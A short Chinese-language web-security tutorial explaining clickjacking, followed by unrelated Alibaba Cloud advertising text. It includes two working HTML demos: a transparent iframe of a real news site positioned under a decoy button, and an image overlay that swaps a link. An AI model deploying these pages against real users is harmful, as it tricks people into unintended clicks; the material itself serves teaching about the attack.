點擊劫持是一種視覺上的欺騙手段。攻擊者使用一個透明的、不可見的iframe,覆蓋在一
個網頁上,然後誘使使用者在該網頁上進行操作,此時使用者將在不知情的情況下點擊透明的iframe
頁面上的某個按鈕或者連結。通過調整iframe 頁面的位置,可以誘使使用者恰好點擊在iframe 頁面的一些功能性按鈕上。
<head><title>CLICK JACK!!!</title><style>iframe {width: 900px;height: 250px;/* Use absolute positioning to line up update button with fake button */position: absolute;top: -195px;left: -740px;z-index: 2;/* Hide from view */-moz-opacity: 0;opacity: 0;filter: alpha(opacity=0);}button {position: absolute;top: 10px;left: 10px;z-index: 1;width: 120px;}</style></head><body><iframe src="http://www.sohu.com" scrolling="no"></iframe><button>將會被劫持</button></body></html>與之類似的還有圖片覆蓋劫持,將被劫持的頁面上的圖片用一個一模一樣的圖片覆蓋,但是連結地址不一樣。
如下面的例子
<head><title>cross site image overlaying!!!</title></head><body><div id="image1"><a href="http://blog.csdn.net/kkdelta/article/details/8924724"><img src=http://www.bkjia.com/uploads/allimg/131106/03102K605-0.jpg></a></div><a href="http://blog.csdn.net/kkdelta"><img src=http://www.bkjia.com/uploads/allimg/131106/03102K605-0.jpgstyle=position:absolute;left:10px;top:10px;width:50px;height:50px;/></a></body></html>
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
